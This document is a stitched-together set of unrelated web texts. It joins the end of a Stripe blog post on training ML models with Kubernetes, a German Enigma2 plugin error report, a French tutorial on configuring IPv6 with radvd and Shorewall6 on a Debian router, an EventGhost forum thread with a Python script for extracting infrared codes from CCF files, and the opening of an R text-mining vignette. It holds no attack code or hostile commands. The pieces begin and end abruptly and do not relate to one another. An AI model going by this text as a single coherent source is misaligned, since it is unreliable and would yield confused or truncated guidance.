Railyard exerts a fine-grained level of control on how Kubernetes distributes jobs across the cluster. For each request, we look at the requested compute resource and set both a Kubernetes Toleration and an Affinity to specify the type of node that we would like to run on. These parameters effectively tell the Kubernetes cluster:
the affinity, or which nodes the job should run on
the toleration, or which nodes should be reserved for specific tasks
Kubernetes will use the affinity and toleration properties for a given Kubernetes pod to compute how jobs should be best distributed across or within each node.
Kubernetes supports per-job CPU and memory requirements to ensure that workloads don’t experience resource starvation due to neighboring jobs on the same host. In Railyard, we determine limits for all jobs based on their historic and future expected usage of resources. In the case of high-memory or GPU training jobs, these limits are set so that each job gets an entire node to itself; if all nodes are occupied, then the scheduler will place the job in a queue. Jobs with less intensive resource requirements are scheduled on nodes to run in parallel.
With these parameters in place, we can lean on the Kubernetes resource scheduler to balance our jobs across available nodes. Given a set of job and resource requests, the scheduler will intelligently distribute those jobs to nodes across the cluster.
One year later: running at scale
Moving our training jobs to a Kubernetes cluster has enabled us to rapidly spin up new resources for different models and expand the cluster to support more training jobs. We can use a single command to expand the cluster and new instance types only require a small configuration change. When the memory requirements of running jobs outgrew our CPU-optimized instance types, we started training on memory-optimized instances the very next day; when we observe a backlog of jobs, we can immediately expand the cluster to process the queue. Model training on Kubernetes is available to any data scientist or engineer at Stripe: all that’s needed is a Python workflow and an API request and they can start training models on any resource type in the cluster.
To date, we’ve trained almost 100,000 models on Kubernetes, with new models trained each day. Our fraud models automatically retrain on a regular basis using Railyard and Kubernetes, and we’re steadily moving more of Stripe’s models onto an automated retraining cycle. Radar’s fraud model is built on hundreds of distinct ML models and has a dedicated service that trains and deploys all of those models on a daily cadence. Other models retrain regularly using an Airflow task that uses the Railyard API.
We’ve learned a few key considerations for scaling Kubernetes and effectively managing instances:
Instance flexibility is really important.Teams can have very different machine learning workloads. In any given day we might train thousands of time series forecasts, a long-running word embedding model, or a fraud model with hundreds of gigabytes of data. The ability to quickly add new instance types and expand the cluster are equally important for scalability.
Managing memory-intensive workflows is hard.Even using various instance sizes and a managed cluster, we still sometimes have jobs that run out of memory and are killed. This is a downside to providing so much flexibility in the Python workflow: modelers are free to write memory-intensive workflows. Kubernetes allows us to proactively kill jobs that are consuming too many resources, but it still results in a failed training job for the modeler. We’re thinking about ways to better manage this, including smart retry behavior to automatically reschedule failed jobs on higher-capacity instances and moving to distributed libraries like dask-ml.
Subpar is an excellent solution for packaging Python code.Managing Python dependencies can be tricky, particularly when you’d like to bundle them as an executable that can be shipped to different instances. If we were to build this from scratch again we would probably take a look at Facebook’s XARs, but Subpar is very compatible with Bazel and it’s been running well in production for over a year.
Having a good Kubernetes team is a force multiplier.Railyard could not have been a success without the support of our Orchestration team, which manages our Kubernetes cluster and pushes the platform forward for the whole organization. If we had to manage and operate the cluster in addition to building our services, we would have needed more engineers and taken significantly longer to ship.
Building ML infrastructure
We’ve learned that building common machine learning infrastructure enables teams across Stripe to operate independently and focus on their local ML modeling goals. Over the last year we’ve used Railyard to train thousands of models spanning use cases from forecasting to deep learning. This system has enabled us to build rich functionality for model evaluation and design services to optimize hyperparameters for our models at scale.
While there is a wealth of information available on data science and machine learning from the modeling perspective, there isn’t nearly as much published about how companies build and operate their production machine learning infrastructure. Uber, Airbnb, and Lyft have all discussed how their infrastructure operates, and we’re following their lead in introducing the design patterns that have worked for us. We plan to share more lessons from our ML architecture in the months ahead. In the meantime, we’d love to hear from you: please let us know which lessons are most useful and if there are any specific topics about which you’d like to hear more.
Like this post? Join the Stripe engineering team. View openings
|
Danke für das Update.
der Fehler ist aber glaube ich noch der gleiche.
Unhandled Error
Traceback (most recent call last):
File "/usr/lib/enigma2/python/mytest.py", line 179, in runReactor
reactor.run(installSignalHandlers=False)
File "/usr/lib/python2.7/site-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/lib/enigma2/python/e2reactor.py", line 200, in mainLoop
runMainloop()
File "/usr/lib/enigma2/python/e2reactor.py", line 170, in simulate
self.runUntilCurrent()
--- <exception caught here> ---
File "/usr/lib/python2.7/site-packages/twisted/internet/base.py", line 773, in runUntilCurrent
f(*a, **kw)
File "/usr/lib/enigma2/python/Plugins/Extensions/EnigmaLight/EL_MainMenu.py", line 249, in showButtons
if self.controller != None:
exceptions.AttributeError: 'EL_Screen_MainMenu' object has no attribute 'controller'
Unhandled Error
Traceback (most recent call last):
File "/usr/lib/enigma2/python/mytest.py", line 179, in runReactor
reactor.run(installSignalHandlers=False)
File "/usr/lib/python2.7/site-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/lib/enigma2/python/e2reactor.py", line 200, in mainLoop
runMainloop()
File "/usr/lib/enigma2/python/e2reactor.py", line 170, in simulate
self.runUntilCurrent()
--- <exception caught here> ---
File "/usr/lib/python2.7/site-packages/twisted/internet/base.py", line 773, in runUntilCurrent
f(*a, **kw)
File "/usr/lib/enigma2/python/Plugins/Extensions/EnigmaLight/EL_MainMenu.py", line 245, in setStatusBarTxt
self["txt_statusbar"].setText(text)
exceptions.KeyError: 'txt_statusbar'
Die Farben werden aber noch immer falsch angezeigt.
Weiß und Schwarz ist ok, aber ein blaues Bild wird rot und ein rotes <Bild blau angezeigt.
stimmt bei mir etwas nicht?
die Einstellung Color Sequenzen scheint nicht zu funktionieren.
Beim speichern erscheint oben genannter Fehler (Enigma log).
Achso in der enigmalight_gui_crash steht folgendes:
Traceback (most recent call last):
File "/usr/lib/enigma2/python/Plugins/Extensions/EnigmaLight/EL_Control.py", line 220, in readInfo
self.current_resolution = text[1]
IndexError: list index out of range
|
Free l'un des ISP pionner dans le déploiement d'IPv6 permet d'avoir un réseau IPv6 chez soi, et ce en toute simplicité sous Linux. ça tombe bien car il devient urgent d'y passer car la pénurie est à notre porte.
En 2007 Free a déployé, à la vitesse de l'éclair, IPv6 en utilisant une variante de 6to4 : 6rd (rd=rapid deploiment). Cette variante permet d'avoir sur la Freebox un réseau complet de 2^64 adresses publiques, c'est-à -dire plus d'IP personnelles que l'ensemble des IPv4 disponibles sur tout Internet !
Mais comment fait-on si l'on utilise la FreeBox en mode modem donc sans voir la FreeBox elle-même et donc sans réseau entre elle et les équipements de l'abonné ?
Pour ma part mon j'ai un serveur qui fait aussi office de routeur. Il est configuré en IP static coté modem FreeBox. Je voudrais y ajouter l'IPv6 (le réseau en fait) qui m'est attribué et passer en double pile IPv4/IPv6.
Bien que la variante 6rd soit basée sur un tunnel 6to4 on peut dire que c'est de l'IPv6 natif car on obtient un vrai préfix IPv6 associé au réseau de Free; les premiers bits indiquant bien que c'est de l'IPv6 non encapsulé et correspondant à un prefix donné à Free.
Cependant, il y a une petite subtilités : les bits suivants correspondent à l'adresse IPv4 publique que Free attribue à chaque abonné ce qui voudrait dire que l'on ne peut avoir une telle adresse sans IPv4; ça n'arrange pas notre histoire de pénurie. Mais bon, Free finira par données des adresses IPv6 seule quand on aura basculé dans le full IPv6. On en reparle d'ici quelques années.
Activation d'IPv6
Bon alors maintenant activons IPv6 sur notre routeur linux :
connecter-vous à l'interface 'console' de la Freebox
activer IPv6 dans les options Internet
redémarrer la FreeBox
et voilà c'est terminé, votre serveur Linux ou n'importe quel PC que vous branchez sur le FreeBox a de forte chance d'être immédiatement accessible en IPv6, et vous venez de rendre vulnérable votre serveur/router car il y a de forte chance qu'aucun firewall ne soit activé. Et inutile de compter sur vos règles iptables ou votre shorewall (ou pfbuilder), le filtrage IPv6 étant complètement dissocié de la partie IPv4.
En fait, dès que la FreeBox active IPv6 elle transmet des annonces
radvsur le réseau qui la relie à votre serveur Linux, et comme celui-ci a certainement le support IPv6 activé par défaut, c'est dans la poche.
Petite précision, toute cette configuration est effectuée sous GNU/Linux Debian. Le wiki Debian contient une section sur le sujet.
Vérifions quand même coté Linux qu'IPv6 est bien supporté. Un simple
ip addrdevrait suffire car toute interface réseau Ethernet a automatiquement une IPv6 de lien local :<metadata lang=Assembly prob=0.20 />
server:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 40:61:86:34:28:58 brd ff:ff:ff:ff:ff:ff
inet 82.224.154.135/24 brd 82.224.154.255 scope global eth0
inet6 2a01:e35:2e09:a870:4261:86ff:fe34:2858/64 scope global dynamic
valid_lft 86224sec preferred_lft 86224sec
inet6 fe80::4261:86ff:fe34:2858/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 100
link/ether 00:0e:0c:80:fb:8c brd ff:ff:ff:ff:ff:ff
inet 10.0.0.1/24 brd 10.0.0.255 scope global eth1
inet6 fe80::20e:cff:fe80:fb8c/64 scope link
valid_lft forever preferred_lft forever
Ici
eth0est l'interface coté publique (relié à la FreeBox donc) eteth1le réseau local privé.
On a bien des
inet6dont unscope linksureth0. C'est une IP restreinte (car elle commence parfe80::) qui permet de communiquer sur le LAN connecté à l'interface. Cela permet de discuter avec les autres serveurs du LAN, faire des annonces, et répondre aux broadcast. L'IP2a01:e35:2e09:a870:4261:86ff:fe34:2858est celle que nos obtenons pas configuration automatique et elle est dan un LAN /64 pour nous tout seul.
En 'sniffant' le réseau local relié à la FreeBox nous pouvons voir passer les annonces de routeur contenant le prefix IPv6 que Free attribue au réseau public personnel à chaque abonné. Ce sont ces annonces qui permettent à l'interface réseau de s'auto-configurer dynamiquement en mode
stateless. Aucun serveur DHCP n'est nécessaire dans ce cas de figure. L'adresse IPv6 de la carte utilisera ce prefix et l'adresse MAC de la carte :<metadata lang=Markdown prob=0.15 />
server:/etc/shorewall6# tcpdump -i eth0 -v ip6
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
01:05:00.746795 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 104) fe80::207:cbff:fe10:ce97 > ip6-allnodes: [icmp6 sum ok] ICMP6, router advertisement, length 104
hop limit 64, Flags [none], pref medium, router lifetime 1800s, reachable time 0s, retrans time 0s
prefix info option (3), length 32 (4): 2a01:e35:2e09:a870::/64, Flags [onlink, auto], valid time 86400s, pref. time 86400s
rdnss option (25), length 40 (5): lifetime 600s, addr: dns3.proxad.net addr: dns2.proxad.net
mtu option (5), length 8 (1): 1480
source link-address option (1), length 8 (1): 00:07:cb:10:ce:97
avec Wireshark on obtient :
On obtient même les adresses IPv6 des serveurs DNS.
C'est le moment de vérifier que le server/routeur Linux a bien accès en IPv6 au monde extérieur.
Il existe à ce propos un site qui a été mis en place pour le World IPv6 Day. En lançant Firefox (ou Iceweseal) depuis le routeur Linux, vous devez obtenir ceci :
et le détail du test :
Note: le Wordl IPv6 Day est déjà passé mais le site rest un bon outils de test.
Accès au réseau privé
Il nous faut ouvrir l'accès aux stations du LAN privé. Il y a plusieurs choix possibles :
créer un sous-réseau IPv6 et le router à travers le firewall; dans ce cas il faut utiliser quelques fonctions de proxy. Je vous invite à lire l'article du wiki de Gentoo.
utiliser un pont ethernet pour 'fusionner' les 2 réseaux et faire comme si toutes les stations sont reliées au LAN de la FreeBox. Je vous invite à lire l'article de Sébastien Chaumontet.
utiliser un routage classique sur le réseau IPv6 tout en faisant croire que tous les host sont sur la LAN freebox.
De notre coté, nous allons retenir la 3éme solution qui ne nécessite pas trop de bidouillage.
Pour commencer nous allons annoncer aux hosts internes note préfix IPv6 et la route par défaut IPv6 :
installation, sur notre routeur linux, du démon
radvdqui va annoncer aux host internes le préfix que nous a attribué Free; c'est aussi ce démon qui va nous indiquer la route par défaut à nos hosts interne, cette route étant forcément notre routeur linux (et il n'est pas possible de modifier cette configuration) :
Activation du routage IPv6 dans le noyau, fichier
/etc/sysctl.conf:<metadata lang=INI prob=0.07 />
net.ipv6.conf.all.forwarding=1
et pour prendre en compte immédiatement les modifications
sysctl -p
Installation du service
radvd:<metadata lang=Batchfile prob=0.06 />
apt-get install radvd
Configuration du démon radvd dans le fichier
/etc/radvd.conf:<metadata lang=CSS prob=0.05 />
interface eth1
{
AdvSendAdvert on;
prefix 2a01:e35:2e09:a870::/64
{
AdvOnLink on;
};
};
Les points importants dans cette configuration sont :
indiquez l'interface du LAN interne dans le paramétre 'interface'; il s'agit du LAN contenant vos host privés et non du LAN freebox<->routeur-linux.
indiquez le prefix que Free vous a attributé pour le paramètre 'prefix'; ce prefix a été trouvé lors de la capture réseau avec WireShark, option 'prefix' du champ ICMPv6 Option du packet ICMP.
Une fois le service redémarré par une simple /etc/init.d/radvd restart, les host internes vont obtenir une IPv6 publique en plus de l'IP lien local (en plus de l'IPv4 privée) et une route IPv6 par défaut (en plus de la route IPv4 par défaut); exemple :
antoine@pcantoine:~$ ip -6 addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qlen 1000
inet6 2a01:e35:2e09:a870:21d:60ff:fe6d:9988/64 scope global dynamic
valid_lft 86162sec preferred_lft 14162sec
inet6 fe80::21d:60ff:fe6d:9988/64 scope link
valid_lft forever preferred_lft forever
antoine@pcantoine:~$ ip -6 route
2a01:e35:2e09:a870::/64 dev eth0 proto kernel metric 256 expires 86039sec
fe80::/64 dev eth0 proto kernel metric 256
default via fe80::20e:cff:fe80:fb8c dev eth0 proto kernel metric 1024 expires 1428sec
L'IP attribuée correspond à la ligne
inet6 2a01:e35:2e09:a870:21d:60ff:fe6d:9988/64 scope global dynamicqui indique une IP publique (global) et dont le début de l'adresse correspond bien à notre prefix Free.
La route par défaut en IPv6 _default via
fe80::20e:cff:fe80:fb8ccorrespond bien au routeur Linux. Il s'agit ici de l'IP lien local du routeur sur le LAN interne (entre le routeur et les host interne).
Nous tenons le bon bout, les packets IPv6 des hosts vont correctement prendre le bon chemin pour sortir vers intenet. Il nous reste quelques détails à régler : le retour des packets depuis internet et le réglage du firewall.
Il faut bien comprendre qu'en IPv6 la notion de translation d'adresse n'est pas naturelle et donc que tous les host sans filtrage sont immédiatement accessibles depuis l'extérieur. Pour le firewall nous allons utiliser Shorewall6 qui nous offre aussi une fonction de
IPv6 – Proxy the neighbors(sorte d'équivalent au proxy ARP). C'est ce proxy neighbourg qui va nous permettre de faire une simili-bridge. Le proxy neighbourg consiste à annoncer en ICMPv6 les hosts internes sur le LAN externe, permettant ainsi de faire croire à la FreeBox que les hosts sont directement sur le lan FreeBox<->routeur linux. C'est le routeur linux qui va prendre les packets et ensuite utiliser le routage 'traditionnel' pour transmettre les packets entrant.
Installation de Shorewall6 :
apt-get install shorewall6
et activation dans le fichier
/etc/default/shorewall6:<metadata lang=Batchfile prob=0.04 />
startup=1
ensuite il faut remplir le fichier proxy-neighbourg et définir le filtrage de base; exemple avec 2 hosts internes :
root@server:/etc/shorewall6/proxyndp<metadata lang=INI prob=0.10 />
#ADDRESS INTERFACE EXTERNAL HAVEROUTE PERSISTENT
2a01:e35:2e09:a870:21d:60ff:fe6d:9988 eth1 eth0
2a01:e35:2e09:a870::2 eth0 eth1root@server:/etc/shorewall6#
eth1 étant l'interface du LAN interne sur le routeu linux et eth0 le LAN publique coté Freebox.
pour le filtrage de base (sortie Internet autorisée, entrée depus Internet bloquée) :
root@server:/etc/shorewall6/interfaces<metadata lang=INI prob=0.32 />
#
# Shorewall version 4.0 - Sample Interfaces File for two-interface configuration.
# Copyright (C) 2006 by the Shorewall Team
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# See the file README.txt for further details.
#------------------------------------------------------------------------------
# For information about entries in this file, type "man shorewall-interfaces"
#
# The manpage is also online at
# http://shorewall.net/manpages/shorewall-interfaces.html
#
###############################################################################
#ZONE INTERFACE BROADCAST OPTIONS
net eth0 detect tcpflags
loc eth1 detect tcpflags
#lg tun0 detect tcpflags
#virt virbr0 detect tcpflags
#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE
root@server:/etc/shorewall6/zones<metadata lang=INI prob=0.28 />
#
# Shorewall version 4.0 - Sample Zones File for two-interface configuration.
# Copyright (C) 2006 by the Shorewall Team
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# See the file README.txt for further details.
#------------------------------------------------------------------------------
# For information about entries in this file, type "man shorewall-zones"
#
# The manpage is also online at
# http://shorewall.net/manpages/shorewall-zones.html
#
###############################################################################
#ZONE TYPE OPTIONS IN OUT
# OPTIONS OPTIONS
fw firewall
net ipv6
loc ipv6
#lg ipv6
#virt ipv6
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE
root@server:/etc/shorewall6/policy<metadata lang=Shell prob=0.40 />
#
# Shorewall version 4.0 - Sample Policy File for two-interface configuration.
# Copyright (C) 2006 by the Shorewall Team
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# See the file README.txt for further details.
#------------------------------------------------------------------------------
# For information about entries in this file, type "man shorewall-policy"
#
# The manpage is also online at
# http://shorewall.net/manpages/shorewall-policy.html
#
###############################################################################
#SOURCE DEST POLICY LOG LEVEL LIMIT:BURST
#
# Note about policies and logging:
# This file contains an explicit policy for every combination of
# zones defined in this sample. This is solely for the purpose of
# providing more specific messages in the logs. This is not
# necessary for correct operation of the firewall, but greatly
# assists in diagnosing problems. The policies below are logically
# equivalent to:
#
# loc net ACCEPT
# net all DROP info
# all all REJECT info
#
# The Shorewall-perl compiler will generate the individual policies
# below from the above general policies if you set
# EXPAND_POLICIES=Yes in shorewall.conf.
#
# Policies for traffic originating from the local LAN (loc)
#
# If you want to force clients to access the Internet via a proxy server
# on your firewall, change the loc to net policy to REJECT info.
#loc net ACCEPT
#loc $FW ACCEPT
loc all ACCEPT
#virt all ACCEPT
#
# Policies for traffic originating from the firewall ($FW)
#
# If you want open access to the Internet from your firewall, change the
# $FW to net policy to ACCEPT and remove the 'info' LOG LEVEL.
# This may be useful if you run a proxy server on the firewall.
#$FW net ACCEPT
#$FW loc ACCEPT
$FW all ACCEPT
#
# Policies for traffic originating from the Internet zone (net)
#
#net $FW DROP info
#net loc DROP info
net all DROP
# THE FOLLOWING POLICY MUST BE LAST
all all REJECT
#LAST LINE -- ADD YOUR ENTRIES ABOVE THIS LINE -- DO NOT REMOVE
root@server:/etc/shorewall6/rules<metadata lang=Shell prob=0.93 />
#
# Shorewall version 4.0 - Sample Rules File for two-interface configuration.
# Copyright (C) 2006,2007 by the Shorewall Team
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# See the file README.txt for further details.
#------------------------------------------------------------------------------
# For information about entries in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://shorewall.net/manpages/shorewall-rules.html
#
#############################################################################################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK
Ping/ACCEPT net all
Ping/ACCEPT $FW all
Ping/ACCEPT loc all
SSH/ACCEPT net $FW
HTTP/ACCEPT net $FW
DNS/ACCEPT net $FW
ACCEPT net $FW tcp 5222
#DNAT net loc:10.0.0.10 udp 31336 -
#DNAT net:83.167.38.34 virt:192.168.122.40 tcp 3389 -
#
## Emule
#ACCEPT net $FW tcp 4662
#ACCEPT net $FW udp 4676
#ACCEPT net $FW udp 4672
#
## BitTorrent
#ACCEPT net $FW tcp 6881
#ACCEPT net $FW tcp 6882
#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE
Voilà , on peut maintenant faire quelques tests de validation depuis l'un des PC internes; par exemple :
antoine@pcantoine:~$ host www.free.fr
www.free.fr has address 212.27.48.10
www.free.fr has IPv6 address 2a01:e0c:1:1599::1
antoine@pcantoine:~$ ping6 -c 3 www.free.fr
PING www.free.fr(www.free.fr) 56 data bytes
64 bytes from www.free.fr: icmp_seq=1 ttl=59 time=73.4 ms
64 bytes from www.free.fr: icmp_seq=2 ttl=59 time=20.4 ms
64 bytes from www.free.fr: icmp_seq=3 ttl=59 time=20.7 ms
--- www.free.fr ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 20.424/38.200/73.434/24.915 ms
antoine@pcantoine:~$ lynx "http://[2a01:e0c:1:1599::1]"
...
et enfin accès à la page du IPv6 Day depuis un PC du LAN interne :
On constate que l'IPv6 est bien publique et commence par le même préfix que l'IPv6 publique du routeur linux (sinon il n'y a aucun chance que cela marche), alors que l'IPv4 est l'unique IP disponible qui est translaté au niveau du routeur.
On a ainsi une IP publique fixe en IPv6 par host configuré sur le proxy.
Ce système n'est pas l'idéle car :
chaque host IPv6 doit être déclaré dans le fichier /etc/shorewall6/proxyndp
l'adresse MAC de chaque host ainsi accessible en IPv6 est rendu publique car codé (et à peine masquée) par l'autoconfiguration stateless du mécanisme mis en place.
En revanche, et grà ce au standard même d'IPv6, chaque host ne fait plus l'objet de (source) NAT au niveau du firewall et donc les problèmes de translattion d'adresse (casspied pour tout ce qui est flux audio/video (vidéo-conférence, ...)) entre 2 host privés sur intenet font partie du passé. Mais encore faudrait-il qu'un maximum d'utilisateurs passe sur ce nouveau protocol, ce qui n'est pas gagné.
A bientôt
Antoine
|
Hi guys
I have recently acquired a Tact Millennium amplifier. It's very old so the possibility of finding an original remote is slim.
Someone had uploaded a CCF file based on the remote to www.remotecentral.com.
I have utilised eventghost many times with a USB receiver, it's a great piece of software! I am wondering it would be possible handle said CCF file "blast" the codes from USB transmitter to the amp. If it works, I can then use the learning functioning on my universal remote to store them.
I am also looking into utilising the IR blaster on my Samsung S5 phone, but I am more familar with event ghost than Android.
Any advice or comments would be greatly appreciated!
Thanks
I have recently acquired a Tact Millennium amplifier. It's very old so the possibility of finding an original remote is slim.
Someone had uploaded a CCF file based on the remote to www.remotecentral.com.
I have utilised eventghost many times with a USB receiver, it's a great piece of software! I am wondering it would be possible handle said CCF file "blast" the codes from USB transmitter to the amp. If it works, I can then use the learning functioning on my universal remote to store them.
I am also looking into utilising the IR blaster on my Samsung S5 phone, but I am more familar with event ghost than Android.
Any advice or comments would be greatly appreciated!
Thanks
kgschlosser
Site Admin
Posts:5508
Joined:Fri Jun 05, 2015 5:43 am
Location:Rocky Mountains, Colorado USA
never mind about the ccf file
download and install this program
http://files.remotecentral.com/view/582 ... oedit.html
it is a pronto editor.
once you have the editor installed go ahead a run it. then open the ccf file
File --> Open Configuration
Once you have the file opened up it may ask you if you want to convert it. You can say ok, this is only happening because the file may be for a pronto remote that is different then one you selected when you first opened up the program.
you need to expand "Devices" in the left pane. then expand the device that is listed under it.
The items in []'s are GUI's that get displayed on the remote. each screen is going to have a bunch of different buttons for the device. so go ahead and double click on on of them.
You will see the various buttons. right click on one of the buttons and then click on properties. the Button Properties dialog will open up. The Action tab should be what you are seeing. on the left side there will be a vertical row of buttons and on the right there is going to be a white box.. in that white box there will one or more items in it. double click on one of the items. the Add IR dialog is going to open up. just above the OK button and alittle to the left there is a button "View IR" click on that button. you will now be able to see the pronto code for that button. that is what you will need to paste into the Transmit IR action in EG.
You are going to have to do this for each and every button on each of the available GUI screens. I know it is kind of a pain to do. but this is the only "free" way to do it. There is a program called Extract CCF that will spit out all of the pronto codes but I believe you have to pay for it.
download and install this program
http://files.remotecentral.com/view/582 ... oedit.html
it is a pronto editor.
once you have the editor installed go ahead a run it. then open the ccf file
File --> Open Configuration
Once you have the file opened up it may ask you if you want to convert it. You can say ok, this is only happening because the file may be for a pronto remote that is different then one you selected when you first opened up the program.
you need to expand "Devices" in the left pane. then expand the device that is listed under it.
The items in []'s are GUI's that get displayed on the remote. each screen is going to have a bunch of different buttons for the device. so go ahead and double click on on of them.
You will see the various buttons. right click on one of the buttons and then click on properties. the Button Properties dialog will open up. The Action tab should be what you are seeing. on the left side there will be a vertical row of buttons and on the right there is going to be a white box.. in that white box there will one or more items in it. double click on one of the items. the Add IR dialog is going to open up. just above the OK button and alittle to the left there is a button "View IR" click on that button. you will now be able to see the pronto code for that button. that is what you will need to paste into the Transmit IR action in EG.
You are going to have to do this for each and every button on each of the available GUI screens. I know it is kind of a pain to do. but this is the only "free" way to do it. There is a program called Extract CCF that will spit out all of the pronto codes but I believe you have to pay for it.
kgschlosser
Site Admin
Posts:5508
Joined:Fri Jun 05, 2015 5:43 am
Location:Rocky Mountains, Colorado USA
OK so scratch the above directions as that is going to be a royal pain
I have a better way.
create a folder on your desktop called "ccf_converter"
unzip the attached file into that folder. there is only a single dll in the file.
place any ccf files you want converted into that folder as well. It will bulk extract the pronto codes and button names.
create a new macro in EG add a Python Script action. Paste the code below into that script. Click on "Apply" and then click on "Test" it will dump all of the button names and pronto codes into the EG log.
I have a better way.
create a folder on your desktop called "ccf_converter"
unzip the attached file into that folder. there is only a single dll in the file.
place any ccf files you want converted into that folder as well. It will bulk extract the pronto codes and button names.
create a new macro in EG add a Python Script action. Paste the code below into that script. Click on "Apply" and then click on "Test" it will dump all of the button names and pronto codes into the EG log.
Code: Select all
import ctypes
from ctypes.wintypes import INT
import os
import shutil
CCF_DUMP_CODES = 0x00000010
path = os.path.join(os.path.expanduser('~'), 'desktop', 'ccf_converter')
hCCFDll = ctypes.cdll.LoadLibrary(os.path.join(path, 'CCFDll.dll'))
CCFRunDumper = hCCFDll.CCFRunDumper
CCFRunDumper.restype = ctypes.POINTER(INT)
for ccf_file in os.listdir(path):
if not ccf_file.endswith('.ccf'):
continue
print ccf_file
szInputCCF = ctypes.create_string_buffer(os.path.join(path, ccf_file))
szOutputDirectory = ctypes.create_string_buffer(path)
DumpFlags = INT(CCF_DUMP_CODES)
CCFRunDumper(szInputCCF, szOutputDirectory, DumpFlags)
for code_file in os.listdir(os.path.join(path, 'codes')):
code_file = os.path.join(os.path.join(path, 'codes', code_file))
with open(code_file, 'r') as f:
data = f.read()
data = data.split('</tr>')[2:-2]
code = [line.strip() for line in data[0].split('\n') if line.strip()][-1]
code = code.split('","')[-1].split('")')[0]
name = [line.strip() for line in data[-1].split('\n') if line.strip()][-2]
name = name.split('">')[-1].split('</')[0]
print name, ':', code
print
print
shutil.rmtree(os.path.join(path, 'codes'))
Attachments
CCFDll.zip
(393.88 KiB) Downloaded 64 times
I've managed to open the file using CCF extractor. However it was made in 2002 and is non standard somehow, so won't convert automatically. However CCF extractor could still view the codes, which I then copy and pasted into iRPlus online xml convertor...
https://irplus-remote.github.io/converter/rcentral.html
Said file loaded into iRplus android app OK, utilising my S5's iR blaster it works The Robman over at JP-1 remote has kindly cleaned up the codes so that they work better and it looks like the problem is solved. I've piggy backed the buttons onto a couple of One 4 All learning remotes for safe keeping.
Thanks for the informative posts guys, very helpful!
https://irplus-remote.github.io/converter/rcentral.html
Said file loaded into iRplus android app OK, utilising my S5's iR blaster it works The Robman over at JP-1 remote has kindly cleaned up the codes so that they work better and it looks like the problem is solved. I've piggy backed the buttons onto a couple of One 4 All learning remotes for safe keeping.
Thanks for the informative posts guys, very helpful!
kgschlosser
Site Admin
Posts:5508
Joined:Fri Jun 05, 2015 5:43 am
Location:Rocky Mountains, Colorado USA
those one4all remotes are great aren't they?. I have a bunch of them. they are well constructed solid remotes and you can hack them.. after all if you can't hack it you don't own it
|
This vignette discuss the new functionality, which is added in the textTinyR package (version 1.1.0). I’ll explain some of the functions by using the data and pre-processing steps of this blog-post.
The following code chunks assume that the nltk-corpus is already downloaded and the reticulate package is installed,
NLTK = reticulate::import("nltk.corpus")
text_reuters = NLTK$reuters
nltk = reticulate::import("nltk")
# if the 'reuters' data is not already available then it can be downloaded from within R
nltk$download('reuters')
documents = text_reuters$fileids()
str(documents)
# List of categories
categories = text_reuters$categories()
str(categories)
# Documents in a category
category_docs = text_reuters$fileids("acq")
str(category_docs)
one_doc = text_reuters$raw("test/14843")
one_doc
The collection originally consisted of 21,578 documents but a subset and split is traditionally used. The most common split is Mod-Apte which only considers categories that have at least one document in the training set and the test set. The Mod-Apte split has 90 categories with a training set of 7769 documents and a test set of 3019 documents.
documents = text_reuters$fileids()
# document ids for train - test
train_docs_id = documents[as.vector(sapply(documents, function(i) substr(i, 1, 5) == "train"))]
test_docs_id = documents[as.vector(sapply(documents, function(i) substr(i, 1, 4) == "test"))]
train_docs = lapply(1:length(train_docs_id), function(x) text_reuters$raw(train_docs_id[x]))
test_docs = lapply(1:length(test_docs_id), function(x) text_reuters$raw(test_docs_id[x]))
str(train_docs)
str(test_docs)
# train - test labels [ some categories might have more than one label (overlapping) ]
train_labels = as.vector(sapply(train_docs_id, function(x) text_reuters$categories(x)))
test_labels = as.vector(sapply(test_docs_id, function(x) text_reuters$categories(x)))
First, I’ll perform the following pre-processing steps :
concat = c(unlist(train_docs), unlist(test_docs))
length(concat)
clust_vec = textTinyR::tokenize_transform_vec_docs(object = concat, as_token = T,
to_lower = T,
remove_punctuation_vector = F,
remove_numbers = F,
trim_token = T,
split_string = T,
split_separator = " \r\n\t.,;:()?!//",
remove_stopwords = T,
language = "english",
min_num_char = 3,
max_num_char = 100,
stemmer = "porter2_stemmer",
threads = 4,
verbose = T)
unq = unique(unlist(clust_vec$token, recursive = F))
length(unq)
# I'll build also the term matrix as I'll need the global-term-weights
utl = textTinyR::sparse_term_matrix$new(vector_data = concat, file_data = NULL,
document_term_matrix = TRUE)
